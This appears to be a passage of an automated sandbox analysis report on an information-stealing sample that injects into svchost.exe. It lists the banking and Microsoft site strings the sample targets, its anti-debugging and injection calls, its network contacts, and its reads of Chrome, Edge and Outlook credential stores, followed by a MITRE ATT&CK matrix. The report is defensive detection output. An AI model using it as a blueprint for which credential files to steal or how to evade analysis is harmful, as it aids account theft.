Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_080A9578 LdrInitializeThunk,3_2_080A9578
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C6EAA2 BlockInput,0_2_00C6EAA2
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C22622
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C14CE8 mov eax, dword ptr fs:[00000030h]0_2_00C14CE8
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00B634E0 mov eax, dword ptr fs:[00000030h]0_2_00B634E0
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00B63540 mov eax, dword ptr fs:[00000030h]0_2_00B63540
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00B61EB0 mov eax, dword ptr fs:[00000030h]0_2_00B61EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E84CE8 mov eax, dword ptr fs:[00000030h]2_2_00E84CE8
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_035C3540 mov eax, dword ptr fs:[00000030h]2_2_035C3540
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_035C34E0 mov eax, dword ptr fs:[00000030h]2_2_035C34E0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_035C1EB0 mov eax, dword ptr fs:[00000030h]2_2_035C1EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 5_2_013D1EB0 mov eax, dword ptr fs:[00000030h]5_2_013D1EB0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 5_2_013D34E0 mov eax, dword ptr fs:[00000030h]5_2_013D34E0
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 5_2_013D3540 mov eax, dword ptr fs:[00000030h]5_2_013D3540
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C50B62
Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C22622
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C1083F
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C109D5 SetUnhandledExceptionFilter,0_2_00C109D5
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C10C21
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E92622
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E8083F
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E809D5 SetUnhandledExceptionFilter,2_2_00E809D5
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Code function: 2_2_00E80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00E80C21
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 118.69.190.131 587
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 158.101.44.242 80
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 149.154.167.220 443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 188.114.97.3 443
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F93008
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C51201
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C32BA5
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C5B226 SendInput,keybd_event,0_2_00C5B226
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C722DA
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C50B62
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C51663
Source: DSD876543456780000.exe, chordates.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DSD876543456780000.exe, chordates.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C10698 cpuid 0_2_00C10698
Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA,3_2_00417A20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA,6_2_00417A20
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe | Queries volume information: unknown VolumeInformation
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C68195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C68195
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C4D27A GetUserNameW,0_2_00C4D27A
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C2B952
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
Source: C:\Users\user\Desktop\DSD876543456780000.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\svchost.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\SysWOW64\svchost.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: chordates.exe, Binary or memory string: WIN_81
              Source: chordates.exe, Binary or memory string: WIN_XP
              Source: chordates.exe, Binary or memory string: WIN_XPe
              Source: chordates.exe, Binary or memory string: WIN_VISTA
              Source: chordates.exe, Binary or memory string: WIN_7
              Source: chordates.exe, Binary or memory string: WIN_8

              Remote Access Functionality

              Source: C:\Users\user\Desktop\DSD876543456780000.exe, Code function 0_2_00C71204: socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
              Source: C:\Users\user\Desktop\DSD876543456780000.exe, Code function 0_2_00C71806: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, Code function 2_2_00EE1204: socket, WSAGetLastError, bind, WSAGetLastError, closesocket, listen, WSAGetLastError, closesocket
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, Code function 2_2_00EE1806: socket, WSAGetLastError, bind, WSAGetLastError, closesocket
              MITRE ATT&CK matrix (one row per line, cells separated by "|"; digits before a technique name are the count badges shown in the original matrix cell):

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 1 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
              Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 137 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 312 Process Injection | 1 Masquerading | LSA Secrets | 331 Security Software Discovery | SSH | 3 Clipboard Data | 4 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 25 Application Layer Protocol | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
